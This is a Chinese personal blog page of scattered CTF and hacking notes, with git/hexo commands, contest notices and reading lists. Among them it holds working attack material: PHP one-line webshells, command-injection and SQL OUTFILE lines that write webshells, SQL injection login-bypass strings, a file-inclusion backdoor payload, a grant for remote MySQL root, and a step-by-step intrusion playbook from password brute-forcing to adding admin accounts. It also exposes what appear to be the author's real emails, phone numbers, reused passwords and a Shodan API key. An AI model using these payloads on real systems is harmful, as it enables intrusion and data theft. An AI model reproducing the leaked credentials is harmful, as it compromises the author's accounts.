<!DOCTYPE html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="emmmm 感觉没啥好说的"><meta name="theme-color" content="#2d4356"><meta name="baidu-site-verification"><title>常 | zhiliya</title><link rel="stylesheet" type="text/css" href="/css/style.css"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.png"><link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script><meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="zhiliya" type="application/atom+xml">
</head><link rel="stylesheet" type="text/css" href="/plugins/highlight/atom-one-dark.min.css"><script type="text/javascript" src="/plugins/highlight/highlight.min.js"></script><script>hljs.initHighlightingOnLoad();
</script><script type="text/javascript" src="/js/ready.js" async></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"><body class="night"><div class="mobile-head" id="mobile-head"><div class="navbar-icon"><span></span><span></span><span></span></div><div class="navbar-title"><a href="/">LITREILY</a></div><div class="navbar-search"><!--= show a circle here--></div></div><div class="h-wrapper" id="menu"><nav class="h-head box"><div class="m-hdimg"><a class="hdimg img" href="/"><img class="nofancybox" src="/img/profile.jpg" width="128" height="128"></a><h1 class="ttl"><a href="/">zhiliya</a></h1></div><p class="m-desc">心之所向，无惧无悔,<br>愿求仁得仁，复无怨怼！</p><div class="m-nav"><ul><li><span class="dot">●</span><a href="/archives/">归档</a></li><li><span class="dot">●</span><a href="/categories/">分类</a></li><li><span class="dot">●</span><a href="/tags/">标签</a></li><li><span class="dot">●</span><a href="/about/">关于</a></li><li><span class="dot">●</span><a href="/atom.xml">RSS</a></li><li class="m-sch"><form class="form" id="j-formsch" method="get"><input class="txt" type="text" id="local-search-input" name="q" value="搜索" onfocus="if(this.value=='搜索'){this.value='';}" onblur="if(this.value==''){this.value='搜索';}"><input type="text" style="display:none;"></form></li></ul><div id="local-search-result"></div></div></nav></div><div id="back2Top"><a class="fa fa-arrow-up" title="Back to top" href="#"></a></div><div class="box" id="container"><div class="l-wrapper"><div class="l-content box"><div class="l-post l-post-art"><article class="p-art"><div class="p-header box"><h1 class="p-title">常</h1><div class="p-info"><span class="p-date"><i class="fa fa-calendar"></i><a href="/2019/11/21/%E5%B8%B8/">2019-11-21</a></span><span class="p-view" id="busuanzi_container_page_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_page_pv"></span></span></div></div><div class="p-content"><center> 13221726781 [861256072@qq.com](mailto:861256072@qq.com)  窝窝头？？？？ 13750703837 14536508 </center>
conda info -e

<p>activate py3</p>
<p>deactivate</p>
<p> r3ver5e    e-&gt;3   s-&gt;5    a-&gt;4，@          i-&gt;1   l  l-&gt;1       o-&gt;0             r-&gt;R            T-&gt;7**     zhiliya-&gt;zhiliy4  0R4ng3</p>
<p>nessus:<a href="https://localhost:8834/#" target="_blank" rel="noopener">https://localhost:8834/#</a><br>shodan的api:PkDlvVwtF7PBT9Fwz2S4o41WMXi0w38l</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">1)、设置用户名：git  config --global  user.name  &#39;github上注册的用户名&#39;;</span><br><span class="line">2)、设置用户邮箱：git config --global user.email &#39;注册时候邮箱</span><br><span class="line">$ git config --global user.name &quot;runoob&quot;</span><br><span class="line">$ git config --global user.email test@runoob.com</span><br><span class="line">3)、校验是否成功 git config --list;</span><br><span class="line"></span><br><span class="line">hexo s    本地部署</span><br><span class="line">localhost:4000</span><br><span class="line"></span><br><span class="line">hexo clean</span><br><span class="line">hexo generate</span><br><span class="line">hexo deploy    github服务器部署</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; [layout] 为布局，可选项为 &#96;post&#96;、&#96;page&#96;、&#96;draft&#96;，这将决定文章所在文件路径。</span><br><span class="line">&#x2F;&#x2F; &lt;title&gt; 为文章标题</span><br><span class="line">&#x2F;&#x2F; 如 hexo new post 除了帅气，我还有啥！</span><br><span class="line">hexo new [layout] &lt;title&gt;</span><br><span class="line"></span><br><span class="line">    </span><br><span class="line">    部署优化</span><br><span class="line"></span><br><span class="line">每次都要执行 hexo clean 和 hexo deploy，不如写个新的脚本</span><br><span class="line">&#x2F;&#x2F; package.json</span><br><span class="line">&quot;dev&quot;: &quot;hexo s&quot;,</span><br><span class="line">&quot;build&quot;: &quot;hexo clean &amp; hexo deploy&quot;</span><br><span class="line"></span><br><span class="line">部署命令</span><br><span class="line">npm run build</span><br></pre></td></tr></table></figure>

<p>u1L战队最近会出版关于CTF书籍《从0到1 CTFer的成长之路》</p>
<p>赛事官网：<a href="https://nctf.x1c.club/" target="_blank" rel="noopener">https://nctf.x1c.club/</a><br>报名时间：Unknown<br>初赛时间：2019年11月22日 18:00 CST — 2019年11月24日 21:00 CST </p>
<p>【wctf  SKCTF PICO CTF bdctf iscc2014 ISG2014 simctf hctf HEBTUCTF hectf  bytectf  jactf】 </p>
<p> 前端安全揭秘 </p>
<p> 安全之路：Web渗透技术及实战案例解析 </p>
<p>)<a href="https://d3ctf.io/" target="_blank" rel="noopener">https://d3ctf.io/</a><br>【QQ群】532023069<br>【时间】<br>众测赛:    11月18日 12:00-11月22日 12:00，<br>        11月25日 12:00-12月08日 12:00<br>线上赛:    11月22日 20:00-11月24日 20:00<br>线下赛:    12月14日-12月15日 </p>
<p>您可以通过以下命令使用自动生成的 Docker 映像：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -p 8000:8000 -it ctfd&#x2F;ctfd</span><br></pre></td></tr></table></figure>

<p> 【赛事播报】@全体成员 </p>
<p>赛事名称：“安洵杯”第二届网络安全大赛<br>主办单位：四川安洵信息技术有限公司<br>技术支撑：成都信息工程大学 道格安全研究实验室<br>赛事官网：<a href="https://axb.d0g3.cn/" target="_blank" rel="noopener">https://axb.d0g3.cn/</a><br>赛方QQ群：793235129<br>报名时间：2019年11月22日 CST — 不关闭<br>CTF初赛时间：2019年11月30日 09:00 CST — 2019年11月30日 17:00 CST </p>
<ul>
<li><p>网站指纹识别工具Whatweb的使用</p>
</li>
<li><p><code>gobuster</code>的暴力目录猜解工具</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -u http://docker.hackthebox.eu:35066/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm</span><br></pre></td></tr></table></figure>



</li>
</ul>
<ul>
<li>kali一个自带的应用wfuzz，进行对参数名的猜解<br>wfuzz –hh=24 -c  -w /usr/share/dirb/wordlists/big.txt <a href="http://docker.hackthebox.eu:35066/api/action.php?FUZZ=test" target="_blank" rel="noopener">http://docker.hackthebox.eu:35066/api/action.php?FUZZ=test</a><br>-hh 后面接从源码中过滤得到的字符数量<br>-c 带颜色输出</li>
</ul>
<ul>
<li>细数github上开源扫描器集合 <a href="https://mp.weixin.qq.com/s?srcid=&amp;scene=23&amp;sharer_sharetime=1571794634913&amp;mid=2657035055&amp;sharer_shareid=a0821fbb64f9b6fe28363c8f21f6c8f8&amp;sn=76c5f5b1d98a2eab2b898ad38b98cbe0&amp;idx=1&amp;__biz=MzAxNDM3NTM0NQ%3D%3D&amp;chksm=803fc3f1b7484ae77135c68ea82b2b65a00c1efa692394b23221171eb433c923b7230e3c9eaf&amp;mpshare=1#rd" target="_blank" rel="noopener">https://mp.weixin.qq.com/s?srcid=&amp;scene=23&amp;sharer_sharetime=1571794634913&amp;mid=2657035055&amp;sharer_shareid=a0821fbb64f9b6fe28363c8f21f6c8f8&amp;sn=76c5f5b1d98a2eab2b898ad38b98cbe0&amp;idx=1&amp;__biz=MzAxNDM3NTM0NQ%3D%3D&amp;chksm=803fc3f1b7484ae77135c68ea82b2b65a00c1efa692394b23221171eb433c923b7230e3c9eaf&amp;mpshare=1#rd</a> </li>
</ul>
<p>web安全命令执行漏洞 net user test 123456 /add echo ^&lt;?php eval($_POST[a]);?^&gt; &gt; a.php</p>
<p>数据库 查看当前数据库用户的权限 show GRANTS for CURRENT_USER(); 写入一句话木马文件 select ‘<?php @eval(&_POST[a]);?>‘ INTO OUTFILE ‘/var/www/html/errors.php’; 查看当前数据库存放路径 SELECT @@datadir; 把user.MYD文件中的数据库用户的密码信息导入到一张表中 load data infile “/var/lib/mysql/mysql/user.MYD” into TABLE test.q fields terminated by ‘ ‘ LINES TERMINATED BY ‘\0’</p>
<p>SQL万能密码</p>
<p>\1.    “or”a”=”a 2.    ‘.).or.(‘.a.’=’.a 3.    or 1=1– 4.    ‘or 1=1– 5.    a’or’ 1=1– 6.    “or 1=1– 7.    ‘or.’a.’=’a 8.    “or”=”a’=’a 9.    ‘or”=’ 10.    ‘or’=’or’</p>
<h4 id="文件包含漏洞写后门"><a href="#文件包含漏洞写后门" class="headerlink" title="文件包含漏洞写后门"></a>文件包含漏洞写后门</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;xxx.com&#x2F;index.php?file&#x3D;php:&#x2F;&#x2F;input &lt;?fputs(fopen(&quot;shell.php&quot;,&quot;w&quot;),&quot;&lt;?php eval($_post[&#39;xxx&#39;];?&gt;&quot;)?&gt;一句话木马：</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span><span class="meta">&lt;?php</span> <span class="keyword">eval</span>($_POST[a]);<span class="meta">?&gt;</span> <span class="number">2.</span><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(@$_REQUEST[<span class="string">'a'</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="命令执行漏洞"><a href="#命令执行漏洞" class="headerlink" title="命令执行漏洞"></a>命令执行漏洞</h4><p>net user test 123456 /add echo ^&lt;?php eval($_POST[a]);?^&gt; &gt; a.php</p>
<h4 id="命令注入写webshell"><a href="#命令注入写webshell" class="headerlink" title="命令注入写webshell"></a>命令注入写webshell</h4><p>WINDOWS：用^转义&lt;，  127.0.0.1 &amp;&amp; echo ^&lt;?php eval($_POST[pandas]); ?^&gt; &gt;   ./webshell.php<br>LINUX：linux下需要用\来转义&lt;  不过很多php都默认开启gpc。可以先用16进制转换一句话再用xxd命令把16进制还原，命令如下：<br>echo 3c3f706870206576616c28245f504f53545b70616e6461735d293b203f3e|xxd -r -ps &gt; web可写目录  /home/wangpeng/webshell.php<br>echo 3c3f706870206576616c28245f504f53545b70616e6461735d293b203f3e|xxd -r -ps &gt; ./webshell.php</p>
<h4 id="数据库"><a href="#数据库" class="headerlink" title="数据库"></a>数据库</h4><p>​    查看当前数据库用户的权限<br>​    show GRANTS for CURRENT_USER();<br>​    写入一句话木马文件<br>​    select ‘<?php @eval(&_POST[a]);?>‘ INTO OUTFILE ‘/var/www/html/errors.php’;<br>​    查看当前数据库存放路径<br>​    SELECT @@datadir;<br>​    把user.MYD文件中的数据库用户的密码信息导入到一张表中<br>​    load data infile “/var/lib/mysql/mysql/user.MYD” into TABLE test.q fields terminated by ‘ ‘ LINES TERMINATED BY ‘\0’</p>
<h4 id="js"><a href="#js" class="headerlink" title="js"></a>js</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">eval</span>(<span class="function"><span class="keyword">function</span>(<span class="params">p,a,c,k,e,d</span>)</span>&#123;e=<span class="function"><span class="keyword">function</span>(<span class="params">c</span>)</span>&#123;<span class="keyword">return</span>(c35?<span class="built_in">String</span>.fromCharCode(c+<span class="number">29</span>):c.toString(<span class="number">36</span>))&#125;;<span class="keyword">if</span>(!<span class="string">''</span>.replace(<span class="regexp">/^/</span>,<span class="built_in">String</span>))&#123;<span class="keyword">while</span>(c--)d[e(c)]=k[c]||e(c);k=[<span class="function"><span class="keyword">function</span>(<span class="params">e</span>)</span>&#123;<span class="keyword">return</span> d[e]&#125;];e=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;<span class="keyword">return</span><span class="string">'\\w+'</span>&#125;;c=<span class="number">1</span>;&#125;;<span class="keyword">while</span>(c--)<span class="keyword">if</span>(k[c])p=p.replace(<span class="keyword">new</span> <span class="built_in">RegExp</span>(<span class="string">'\\b'</span>+e(c)+<span class="string">'\\b'</span>,<span class="string">'g'</span>),k[c]);<span class="keyword">return</span> p;&#125;(<span class="string">'&lt;1 8="7/a"&gt;9(\'\\6\\3\\2\\5\\4\\b\\i\\h\\k\\j\\0\\g\\d\\c\\f\\0\\e\')'</span>,<span class="number">21</span>,<span class="number">21</span>,<span class="string">'u0065|script|u006d|u0069|u0054|u0043|u0053|text|type|alert|javascript|u0046|u006f|u0063|u007d|u0064|u006e|u006a|u007b|u005f|u0073'</span>.split(<span class="string">'|'</span>),<span class="number">0</span>,&#123;&#125;))</span><br></pre></td></tr></table></figure>

<p>修改后：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">console</span>.log(<span class="function"><span class="keyword">function</span>(<span class="params">p,a,c,k,e,d</span>)</span>&#123;e=<span class="function"><span class="keyword">function</span>(<span class="params">c</span>)</span>&#123;<span class="keyword">return</span>(c&lt;a?<span class="string">""</span>:e(<span class="built_in">parseInt</span>(c/a)))+((c=c%a)&gt;<span class="number">35</span>?<span class="built_in">String</span>.fromCharCode(c+<span class="number">29</span>):c.toString(<span class="number">36</span>))&#125;;<span class="keyword">if</span>(!<span class="string">''</span>.replace(<span class="regexp">/^/</span>,<span class="built_in">String</span>))&#123;<span class="keyword">while</span>(c--)d[e(c)]=k[c]||e(c);k=[<span class="function"><span class="keyword">function</span>(<span class="params">e</span>)</span>&#123;<span class="keyword">return</span> d[e]&#125;];e=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;<span class="keyword">return</span><span class="string">'\\w+'</span>&#125;;c=<span class="number">1</span>;&#125;;<span class="keyword">while</span>(c--)<span class="keyword">if</span>(k[c])p=p.replace(<span class="keyword">new</span> <span class="built_in">RegExp</span>(<span class="string">'\\b'</span>+e(c)+<span class="string">'\\b'</span>,<span class="string">'g'</span>),k[c]);<span class="keyword">return</span> p;&#125;(<span class="string">'&lt;1 8="7/a"&gt;9(\'\\6\\3\\2\\5\\4\\b\\i\\h\\k\\j\\0\\g\\d\\c\\f\\0\\e\')'</span>,<span class="number">21</span>,<span class="number">21</span>,<span class="string">'u0065|script|u006d|u0069|u0054|u0043|u0053|text|type|alert|javascript|u0046|u006f|u0063|u007d|u0064|u006e|u006a|u007b|u005f|u0073'</span>.split(<span class="string">'|'</span>),<span class="number">0</span>,&#123;&#125;))</span><br></pre></td></tr></table></figure>



<h4 id="python"><a href="#python" class="headerlink" title="python"></a>python</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1000</span>):</span><br><span class="line">    print(str(i).zfill(<span class="number">3</span>))</span><br><span class="line">	//zfill方法用零垫串来填充左边宽度</span><br></pre></td></tr></table></figure>

<p>PHP 基本语法学习并书写一个简单的博客系统，参见《PHP 与 MySQL 程序设计（第 4 版）<br>熟悉 MVC 架构，并试着学习一个 PHP 框架或者 Python 框架（可选）；</p>
<p> 可以得到 flag.txt，去掉换行之后即为答案。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">cat flag.txt | tr -d '\n\r'</span><br><span class="line"><span class="meta">$</span><span class="bash"> file flag.enc</span></span><br><span class="line">flag.enc: data</span><br><span class="line"><span class="meta">$</span><span class="bash"> strings flag.enc | grep flag</span></span><br><span class="line">使用 hexdump 命令发现有很多 0x39，判断 0x39 对应 0x00。</span><br><span class="line">cat nvshen.txt | base64 --decode &gt; nvshen.png</span><br><span class="line"></span><br><span class="line">unzip -t </span><br><span class="line">666C61677B57336C6563306D655F376F5F466F72336E356963737D</span><br><span class="line">使用hash-identifier简单识别：</span><br><span class="line">将hash复制到文档中，用john FileName --format=nt进行密码破解（本次破解为空密码）</span><br><span class="line">注：john破解的密码会保存在本地目录.john中的john.pot文件，如需再次破解相同密码需要使用--show或者将john.pot文件删除。</span><br><span class="line">shadow文件破解：john -show shadow</span><br></pre></td></tr></table></figure>

<h4 id="溢出"><a href="#溢出" class="headerlink" title="溢出"></a>溢出</h4><blockquote>
<p>$$<br>int： 2<strong>32-1 = 4294967295<br>long： 2</strong>63 -1 = 9223372036854775807<br>9223372036854775807<br>922337203685477500<br>longlong： 2**64-1 = 18446744073709551615<br>$$</p>
</blockquote>
<hr>
<p>黑客秘籍——渗透测试实用指南</p>
<p>LCTF 2018 Writeup – Nu1L <a href="https://xz.aliyun.com/t/3341" target="_blank" rel="noopener">https://xz.aliyun.com/t/3341</a><br>LCTF 2018 Writeup – Aurora  <a href="https://xz.aliyun.com/t/3340" target="_blank" rel="noopener">https://xz.aliyun.com/t/3340</a><br>LCTF 2018 Writeup – whitzard  <a href="https://xz.aliyun.com/t/3338" target="_blank" rel="noopener">https://xz.aliyun.com/t/3338</a><br>LCTF 2018 Writeup – ROIS  <a href="https://xz.aliyun.com/t/3339" target="_blank" rel="noopener">https://xz.aliyun.com/t/3339</a></p>
<p>Windows编程  Windows核心编程 在 Windows 编程学习到一定程度后就可以开始核心编程，其实二者并无太大区别，<br>只是核心编程更加偏重 windows 内核的一些机制。当你的技术不仅限于开发桌面应<br>用以后，木马、病毒这些更接近系统底层的东西既可以满足要求。<br>这本书对于以后做开发的同学必看不可：《Windows 核心编程》、《天方夜谭》、<br>《寒江独钓》</p>
<p>汇编语言 逆向破解（推荐图书：《加密与解密》）木马免杀（在逆向学习完成后，又<br>可以分为几个小方向：深入破解、exploi<br>t、木马免杀。 推荐图书：《黑客免杀攻防》）  Exploit二进制漏洞（其中 Exploit<br>对技术要求较高，回报也最丰厚，所以是很多大牛集结之地。学习 exp<br>需要对 C、C++有牢固的基础，并有一双发现问题的眼睛。在他人眼中可能只是一<br>个软件崩溃或错误信息，在 exper 眼里就可以是无穷无尽的财富。）</p>
<p>学习渗透的同学在这段时间又能分为两条路，一是 web 安全，二是内网渗透。web<br>安全偏重于 web 应用漏洞挖掘和利用，内网渗透偏重于网络环境的分析、内网计算<br>机的漏洞利用。<br>内网中大部分重要计算机属于 Linux，所以学会 Linux 基础的使用，Linux 各种服<br>务的搭建、维护、漏洞利用修补是必须的。</p>
<p>《汇编语言》 /《intel汇编语言程序设计》<br>   (看得懂汇编即可，开始要求不高)<br>《逆向工程核心原理》不错的书<br>《加密与解密-第三版》比较旧</p>
<h4 id="nc"><a href="#nc" class="headerlink" title="nc"></a>nc</h4><p>nc是netcat的简写，有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用，被设计为一个简单、可靠的网络工具<br>TCP端口扫描</p>
<p>nc -v -z -w2 192.168.0.3 1-100 </p>
<p>扫描UDP端口</p>
<p>nc -u -z -w2 192.168.0.1 1-1000 //扫描192.168.0.3 的端口 范围是 1-1000</p>
<p>扫描指定端口</p>
<p>nc -nvv 192.168.0.1 80 //扫描 80端口</p>
<p>google邮箱:<a href="mailto:zhiliya1@gmail.com">zhiliya1@gmail.com</a> zhang21448</p>
<p>博客园:zhiliya1 zhang21448..</p>
<p>xctf zhiliya zhang21448</p>
<p>南邮<br>zhiliya  zhang21448<br><a href="mailto:3580481200@qq.com">3580481200@qq.com</a><br>新南邮<br><a href="mailto:1036596518@qq.com">1036596518@qq.com</a><br>zhiliya<br>zhang21448<br>【】 <a href="http://ctf.d0g3.cn/register" target="_blank" rel="noopener">http://ctf.d0g3.cn/register</a><br>zhiliya<br><a href="mailto:1036596518@qq.com">1036596518@qq.com</a><br>zhiliya.php<br>【】<a href="http://ctf.bugku.com/challenges" target="_blank" rel="noopener">http://ctf.bugku.com/challenges</a><br><a href="mailto:103659518@qq.com">103659518@qq.com</a>/zhang21448<br>【】x计划平台<br>gfw<br>18758998699<br>【】思科官网<br>【】思科学院账号<br><a href="mailto:1036596518@qq.com">1036596518@qq.com</a><br>Zhang21448<br><a href="https://373583482.netacad.com/courses/749182" target="_blank" rel="noopener">https://373583482.netacad.com/courses/749182</a> 页面名称</p>
<p>52acg<br><a href="http://www.hxcys.cn" target="_blank" rel="noopener">www.hxcys.cn</a></p>
<p>owasp<br>mysql和远程登录账号密码都是:<br>root/owaspbwa</p>
<p>turnkey-wordpress-15.0-stretch-amd64密码 admin的 mysql的 root的 zhang21448..</p>
<p>shodan apikey:PkDlvVwtF7PBT9Fwz2S4o41WMXi0w38l<br>Display Name zhiliya<br>Email <a href="mailto:1036596518@qq.com">1036596518@qq.com</a><br>Export Credits 0 </p>
<p>maltego:<br><a href="mailto:1036596518@qq.com">1036596518@qq.com</a></p>
<p>  ISCC2018/2019 信息安全与对抗技术竞赛一等奖、2019 强网杯全国网络安全挑战赛三等奖、全国大学生信息安全竞赛三等奖、全国高校西普杯信息安全铁人三项赛二等奖、浙江省大学生与信息安全竞赛二等奖、国家网络安全宣传周 “巅峰极客” 网络安全技能大赛三等奖、西湖论剑网络安全技能大赛三等奖等各类全国奖项 </p>
<h4 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h4><blockquote>
<p>1、dnswalk工具<br>作用：dns排错工具<br>路径：/pentest/enumeration/dns/dnswalk<br>命令： ./dnswalk baidu.com.</p>
<p>2、dnstracer<br>作用：获取dns的记录<br>命令： dnstracer koohik.com</p>
<p>3、dnsenum<br>作用：收集一个域的信息<br>路径：/pentest/enumeration/dns/dnsenum<br>命令：./dnsenum.pl koohik.com<br>常用命令：./dnsenum.pl –enum -f dns.txt –update a -r remote </p>
</blockquote>
<p>信息安全</p>
<p>程序员的自我修养<br>CSAPP<br>glibc内存管理ptmalloc源代码分析<br>这三本打底子够了<br>信息安全工程师教程<br>web攻防之业务安全实战指南<br>网络工程师教程<br>计算机安全<br>应用密码学：原理 协议 c程序 机械工业出版社 黑书<br>网络安全技术与应用<br>php代码审计<br>欺骗的艺术<br>离散数学<br>信号与系统概论<br>现代通信技术<br>微机原理与应用<br>现代密码学<br>计算机组成原理<br>操作系统<br>网络安全与管理<br>数据库系统原理<br>（现代密码学<br>信息安全数学基础<br>rev pwn<br>汇编<br>深入理解计算机系统<br>程序员的自我修养<br>加密与解密<br>windows pe权威指南<br>逆向工程核心原理<br>c++反汇编与逆向分析技术揭秘<br>有趣的二进制<br>ibm-pc汇编语言程序<br>intel汇编语言程序设计<br>加密与解密<br>缓冲区溢出攻击<br>web<br>web安全深度剖析<br>python绝技<br>代码审计 企业级web代码安全架构<br>安全之路 web渗透技术及实战案例解析<br>网络安全测试实验室搭建指南<br>sql注入攻击与防御<br>Web前端黑客技术揭秘<br>路由器交换机项目实训教程<br>网络攻击与防御技术<br>网络攻防及技术实践<br>图灵社区 <a href="http://www.ituring.com.cn/" target="_blank" rel="noopener">http://www.ituring.com.cn/</a><br>大的:<br>i春秋 usaas平台<a href="https://www.ichunqiu.com/" target="_blank" rel="noopener">https://www.ichunqiu.com/</a><br>吾爱破解网<br>青藤社区<br>看雪论坛<br>ctftime<br>漏洞银行<br>启明星辰<br>安全牛<a href="https://edu.aqniu.com/?utm_source=qq&amp;utm_medium=social" target="_blank" rel="noopener">https://edu.aqniu.com/?utm_source=qq&amp;utm_medium=social</a><br>小一点的:<br>红黑联盟<br>黑客风云论坛<br>溜客论坛<br>菜鸟腾飞安全网<a href="http://www.cainiaotengfei.com/" target="_blank" rel="noopener">http://www.cainiaotengfei.com/</a><br>havk80<br>//黑吧安全网 <a href="http://www.myhack58.com" target="_blank" rel="noopener">http://www.myhack58.com</a><br>龙天论坛<a href="https://www.lthack.com" target="_blank" rel="noopener">https://www.lthack.com</a><br>看雪<a href="https://www.pediy.com/" target="_blank" rel="noopener">https://www.pediy.com/</a></p>
<p><a href="http://ceye.io/" target="_blank" rel="noopener">http://ceye.io/</a><br><a href="https://leetcode-cn.com" target="_blank" rel="noopener">https://leetcode-cn.com</a> ，打算跟着这个网站学<br><a href="http://news.hack-ma2.cn/" target="_blank" rel="noopener">http://news.hack-ma2.cn/</a><br><a href="https://blog.dyboy.cn/" target="_blank" rel="noopener">https://blog.dyboy.cn/</a><br>郁离歌<a href="http://yulige.top/" target="_blank" rel="noopener">http://yulige.top/</a><br>透明的小窝<a href="http://www.1945cn.org/" target="_blank" rel="noopener">http://www.1945cn.org/</a><br>root0days<a href="https://www.ipv6data.cn" target="_blank" rel="noopener">https://www.ipv6data.cn</a><br>pcat<a href="http://pcat.cnblogs.com/" target="_blank" rel="noopener">http://pcat.cnblogs.com/</a><br>iag<a href="http://www.aidejc.cn/" target="_blank" rel="noopener">http://www.aidejc.cn/</a><br>提交ctf wiki <a href="https://ctf-wiki.github.io/ctf-wiki/" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/</a><br>网络安全灯<a href="https://www.sectown.cn/" target="_blank" rel="noopener">https://www.sectown.cn/</a><br>信息安全知识库<a href="http://vipread.com/index" target="_blank" rel="noopener">http://vipread.com/index</a><br>工具站<a href="http://ctf.ssleye.com/" target="_blank" rel="noopener">http://ctf.ssleye.com/</a><br>靶机<a href="http://xss.tv/index.php?key=a828f3188f80f17c" target="_blank" rel="noopener">http://xss.tv/index.php?key=a828f3188f80f17c</a><br>H3CSE HCNP CCNP RCNP<br>mcse<br>思科<br>ccsp</p>
<p>awvs扫一波漏洞 目录<br>如果ip被封<br>nmap扫端口(如果发现数据库端口3306mysql数据库 3389远程桌面<br>可以进行弱口令爆破，结合网站个人信息，密码为网址)<br>如果数据库爆破成功，找管理员账号密码<br>找到可扫目录登录<br>如果没找到管理员账号密码，写入一句话上传，找绝对路径(通过数据库注入)<br>菜刀连接<br>上传大马<br>访问大马<br>获取webshell权限<br>添加管理员账号<br>3389远程桌面连接<br>MySQL数据库拿到访问权之后的一些信息收集语句：<br>显示版本：select version();<br>显示字符集：select @@character_set_database;<br>显示数据库show databases;<br>显示表名：show tables;<br>显示计算机名：select @@hostname;<br>显示系统版本：select @@version_compile_os;<br>显示mysql路径：select @@basedir;<br>显示数据库路径：select @@datadir;<br>显示root密码：select User,Password from mysql.user;<br>开启外连：GRANT ALL PRIVILEGES ON <em>.</em> TO ‘root’@’%’ IDENTIFIED BY ‘123456’ WITH GRANT OPTION;</p>
<p>强网杯 安恒杯 ddvtf 13<br>360企业安全春秋杯18 9-17<br>Bctf21<br>全国大学生信息安全竞赛28-29 (xctf第五届）<br>红帽杯30<br>N1CTF国际赛<br>“胖哈勃杯”第十三届信息安全技术大赛<br>九月十月，世安杯<br>456西普杯<br>铁人三项赛<br>xctf<br>xdctf</p>
<p>十五个Web狗的CTF出题套路<br>一、爆破，包括包括md5、爆破随机数、验证码识别等<br>二、绕WAF，包括花式绕Mysql、绕文件读取关键词检测之类拦截</p>
<blockquote>
<p>三、花式玩弄几个PHP特性，包括弱类型，strpos和===，反序列化 destruct、\0截断、iconv截断、</p>
</blockquote>
<p>四、密码题，包括hash长度扩展、异或、移位加密各种变形、<strong>32位随机数过小</strong></p>
<p>五、各种找源码技巧，包括git、<strong>svn</strong>、<strong>xxx.php.swp、<em>www</em>.(zip|tar.gz|rar|7z)、xxx.php.bak、~</strong><br>六、文件上传，包括花式文件后缀 .php345 .inc .phtml .phpt.phps、各种文件内容检测&lt;?php  &lt;?  &lt;% &lt;scriptlanguage=php&gt;、花式解析漏洞、<br>七、<strong>Mysql类型差异，包括和PHP弱类型类似的特性,0x、0b、1e之类，varchar和integer相互转换</strong><br>八、open_basedir、<strong>disable_functions</strong>花式绕过技巧，包括dl、mail、imagick、bash漏洞、DirectoryIterator及各种二进制选手插足的方法<br>九、条件竞争，包括竞争删除前生成shell、竞争数据库无锁多扣钱<br>十、社工，包括花式查社工库、微博、QQ签名、whois<br>十一、windows特性，包括短文件名、IIS解析漏洞、NTFS文件系统通配符、::$DATA，冒号截断<br>十二、SSRF，包括花式探测端口，302跳转、花式协议利用、gophar直接取shell等<br>十三、XSS，各种浏览器auditor绕过、富文本过滤黑白名单绕过、flash xss、CSP绕过<br>十四、XXE，各种XML存在地方（rss/word/流媒体）、各种XXE利用方法（SSRF、文件读取）</p>
